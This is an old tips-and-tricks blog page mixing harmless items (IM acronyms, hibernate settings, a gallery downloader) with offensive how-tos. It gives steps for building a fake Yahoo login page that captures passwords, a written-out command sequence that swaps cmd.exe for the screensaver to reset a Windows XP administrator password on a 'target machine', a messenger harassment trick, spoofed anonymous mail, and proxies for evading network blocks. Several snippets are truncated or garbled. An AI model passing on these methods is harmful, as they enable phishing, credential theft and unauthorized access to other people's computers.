Saturday, November 24, 2007

Here is the complete list of proxy sites to open blocked sites

* https://kproxy.com
* http://62.193.235.46
* http://62.193.226.25
* http://62.193.236.96
* http://62.193.226.74
* http://62.193.236.100
* http://62.193.245.234
* http://62.193.240.162
* http://www.atunnel.com
* http://www.aplusproxy.com
* http://proxify.com
* http://www.msproxy.net
* www.cacheless.org
* www.diyrollercoaster.com
* www.greenrabbit.org
* www.hybridstormlabs.com
* www.ibypass.biz
* www.ibypass.com
* www.ibypass.name
* www.ibypass.net
* www.ibypass.org
* www.ibypass.us
* www.ibypass.ws
* www.melloyello.org
* www.saselinux.com
* www.mathtunnel.com
* www.the-cloak.com
* www.ninjaproxy.com
* http://proxify.com
* https://www.vtunnel.com
* www.webroxy.com

The complete List of most commonly used Acronyms in Instant Messaging / Internet

Here is a list of most commonly used acronyms in instant messaging, Check this list once so that you need ask what it means when some one says AFAIC or FYI

* AFAIC - As far as I’m concerned

* AFAIK - As Far As I Know

* AFK - Away From Keyboard

* ASAP - As Soon As Possible

* BBL - Be Back Later

* BBN - Bye Bye Now

* BBS - Be Back Soon

* BF - Boyfriend

* BRB - Be Right Back

* BTW - By The Way

* BWL - Bursting With Laughter

* CID - Crying In Disgrace

* CYA - See You (Seeya)

* CYAL8R - See You Later (Seeyalata)

* EMSG - Email Message

* FC - Fingers Crossed

* FTBOMH - From The Bottom Of My Heart

* FYI - For Your Information

* GAL - Get A Life

* GF - Girlfriend

* GFN - Gone For Now

* GMTA - Great Minds Think Alike

* GTSY - Glad To See You

* H&K - Hug and Kiss

* HAGN- Have A Good Night

* HHIS - Hanging Head in Shame

* IAE - In Any Event

* IC - I See

* IMNSHO - In My Not So Humble Opinion

* IMO - In My Opinion

* IMHO - In My Humble Opinion

* IOW - In Other Words

* JMO - Just My Opinion

* KIT - Keep In Touch

* L8R - Later

* LHM - Lord Help Me

* LMAO - Laughing My A$$ Off

* LOL - Laugh Out Loud

* LTNS - Long Time No See

* MTF - More To Follow

* NRN - No Reply Necessary

* OIC - Oh, I See

* OTOH - On The Other Hand

* PM - Private Message

* ROFL - Rolling On Floor Laughing

* SO - Significant Other

* SOT - Short Of Time

* SWL - Screaming with Laughter

* SYS - See You Soon

* TA - Thanks Again

* TGIF - Thank God It’s Friday

* TCOY - Take Care Of Yourself

* TNT - Till Next Time

* TOY - Thinking Of You

* TTFN - Ta Ta For Now

* TTYL - Talk To You Later

* YBS - You’ll Be Sorry

TIMER FOR WINDOWS SHUTDOWN AND RESTART

This may be help to you if have the habit of listening to songs and sleeping or if you are planning to download some thing. open notepad and type
“shutdown -s -t

Spamming in Yahoo Messenger


Hi guys,

Do u want to irritate your friends on yahoo messenger here is a way to do that. Just hold ctr+shift+r for some time. This is the shortcut for requesting contact details. Every time you ask for contact details a new window appears in the other persons computer a kind of flaw in yahoo messenger.

NOTE: This is a very old trick and it may not work on some versions of yahoo messenger. Try your luck, have fun :D

here is a screen shot of it

Creating f@ke login pages

Many people asked me how to create f@ke login pages,here is the method to create them (I’m taking yahoo mail as an example)

First save the yahoo login page, then copy the source code of the page directly from internet on to note pad or you favorite text editor (if you are using internet explorer right click on the login page and select view source for mozilla press ctr+u) .Now search for the term “action”, you should find a line like this


When you enter your login information in the original login page, it is submitted to this url https://login.yahoo.com/config/login
change https://login.yahoo.com/config/login to “input.php” . When you change the action to input.php, user name and password are submitted to this file when ever user enters his login information in our f@ke login page.

I will tell you how to create this input.php file, what is its function and how the passwords are saved in my next post

Download all the images in a gallery …

I have the hobby of collecting wallpapers and pics. Its always been a problem to save each image manually as it takes a lot of time to save 100+ images. I have been always thinking to develop a method to download all the images in the gallery at once and developed this trick. You should have download accelerator to perform this trick. You can find many download accelerators in the web of them all i found mass downloader is the best one, you can also use DAP( Download accelerator + ) or IDM ( Internet download manager ).

Here is the trick

Most of the sites save the images of a particular gallery with a common name followed by a number for example “image1″,”image2″,”image3″ and so on, first we are going to get the image url and then use a “C” program to produce a html page ( dload.htm) which contains links to all the images in the gallery.

How to get the url of the image..?

You should have mozilla firefox if you don’t have it you can download it hereFirefox 2
open the gallery which you want to download in mozilla . Now open 3 to 4 images of the gallery , right click on the image and select view image now you will get the url of the image in the address bar compare the urls 3-4 images to find a pattern in them.Now copy the url and replace the url in the code given below with it.Now replace the numbers in the image name which are varying with %d in our case replace “image1″ with “image%d”. You can get the upper limit of “i” by checking the url of the last image

compile and run the code given below after replacing the url and open the dload.htm file produced in your favourite browser right click on any of the link and select download all files with mass downloader in case you installed mass downloader now all the files will be downloaded automatically :)

C code with explanation

#include
main()
{
FILE *fp;
int i;
fp=fopen(”dload.htm”,”w”); /*creates a file named dload.htm */

/*We are using this for loop to write the url’s of the images in to dload.htm */

for(i=0;i<100;i++)

fprintf(fp,”page%d \n”,i,i);

}

Tip : If you want to download more galleries use another for loop changing the url

If you don’t know programming….

Don’t worry,there is a ready made PHP program form you. You just need to enter the Url and the starting and the ending number of the images. Follow this link
Posted under c-programing, Download images, html, php, programming

Hibernate your computer to save the start up time

Hibernate for faster start
If you turn-down computer when you’re not working on it, you will save the energy, but not the time. If you don’t want to wait until computer turns on, log on, … than you can use Hibernate function. However, you can’t “sleep” all computer like that. Windows 9x with Fat32, for example, can’t hibernate.

How you can tell if your system can hibernate?

In Windows 2000 or Windows XP, login like administrator. In Internet explorer, or in any directory go to 'or' in Address field, type

=>“control panel power options” and click Enter. If you see Hibernate card, in dialog box, great. Open that card and see “Disk space for hibernation”. See if your computer fits that condicions. Check “Enable hibernation” and be shore there is no error message.
Next time when you chose “Start-Shutdown” (Windows 98, ME and 2000), chose Hibernate option and go OK. In WindowsXP, chose “Start-Turn Off Computer” and click Shift to turn “Stand By” button to “Hibernate” button

send anyone anonymous mails…………….

so guys click this link to send someone fke mails without revealing ur id….u can just select the FROM Id….

http://geniushackers.com/anonymous-mail

if u like this well……….do reply……….guy’s!!!!!!!!!11

Open any blocked site

hiii all

Cant open the sites you want at college or office????

Don’t worry there are lot of ways to open them, here are a few of them.

1. Use the below given anonymous proxy sites to open sites like orkut, myspace, gmail, yahoo, hi5 or any other XXX site

  1. www.proxylord.com
  2. kproxy.com
  3. www.proxyfoxy.com
  4. www.hidemyass.com
  5. www.youhide.com
  6. www.proxyblind.org

You can use this site for instant messaging on Yahoo, Gmail, MSN .

www.meebo.com

2.USE URL REDIRECTION TECHNIQUES

Use redirection services like TinyURL which give a unique link to any site. Just make blocked sites like orkut.com be pointed by such a unique URL like that aof tinyurl.This works b’coz such redirection sites make the adress bar blank while loading. For orkut.com i’ve just made a tiny url link http://tinyurl.com/3ndzn by clicking which you’ll land in orkut you can make any and many for any site you like by visiting Tinyurl.Com homepage.

3.GOOGLE PROXY-LANGUAGE TOOLS

Use language tools like Google Translator or Google LanguageTools to access restricted sites.Here’s what you need to do visit Google Translator and there you see under Translate 2 types of translations are mentioned in or. One is text translator which u ignore just after or there is a website translator. Just write the website name(obviously the blocked site you want to visit) at the text box just bellow the text ” Translate a web page:“. In the language selector box select “French to English” or any language to english or English to English if you still want the site to be in english and then click on translate. Now the intended page in english will appear as if inside google translator not the actual webpage so now we indirectly accesed blocked site as this translator site which is unblocked acts as a proxy. Trick here is that the site intended is in english but we need to translate it to english b’coz we need the translator site act as proxy so we used French 2 English in that translator.

The output link was like http://translate.google.com/translate?u=http://dishadow.blogspot.com&langpair=fr|en which was from french to english as indicated by “langpair=fr|en” and the site mentioned after “u=” in the o/p link is the site intended which is http://dishadow.blogspot.com here. If we do from english to english we’ve to write “langpair=en|en” and if we intend to view blocked site orkut.com then u=http://orkut.com resulting in total link http://translate.google.com/translate?u=http://orkut.com&langpair=en|en which can be used directly without visiting the translator sites. Due to this google translator is some times said as Google Proxy.

Other translator sites such as Babel Fish Translation Free translation Language Translation can be used to translate from english to english or from other language to english.

4.CACHED PAGES

Most search engines like Google search caches each site it indexes and such caches are pages with contents of website by deleting all stylesheets images etc. seach for site you want that’s blocked in google or yahoo.After a list oif results appear if u wanna see one then don’t click on the link directly.Just see some link “Cached pages” or like that near to the actual link. Click there to see cached pages.


Don’t have access to above mentioned sites?????

we have a way to overcome this problem also

First download the windows installer if you have java installed on ur computer else download windows full installer from this page

http://www.your-freedom.net

Register an account here and enjoy surfing the websites of your choice without any restrictions. Please post your comments if this post was helpful to you

Happy browsing

Be Very Careful with this..! ctr+c n ctr+v

hi friends,

We all copy various data by using ctrl+c/Copy for pasting elsewhere.
This copied data is stored on clipboard and is accessible over the net by a combination of Javascripts and ASP.

Just try this:
1) Copy any text by ctrl+c
2) Click the Link: http://www.friendlycanadian.com/applications/clipboard.htm
3) You will see the text you copied on the Screen which was
accessed by this web page.

Moral:
Do not keep sensitive data (like passwords, creditcard numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information. If sufficient data is stored by mistake it would give away confidential and important information without you knowing about it.

To Avoid This
To avoid this, follow these steps:

1. Go to internet options->security

2. Press custom level

3. In the security settings, select disable under Allow paste operations via script.
Now the contents of your clipboard are safe.

Pass this information on to create an awareness of the same.

Safe Browsing,
Cheers.

Source: Can be found on lot of blogs and forums, just google for it

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

“net user password”

If the Administrator Account is called hunt and you want the password universe enter this

“net user hunt universe”

and this changes the password on franks machine to blah and your in.
Have fun

Featured Posts

Adding Accesspolicy to KeyVault for Service Principal Using Portal and Powershell

  Scripts path : https://drive.google.com/drive/folders/1sbBpnVFgXhUIXLdf2E9heyWDeU2f9427?usp=sharing  Adding Accesspolicy to KeyVault for S...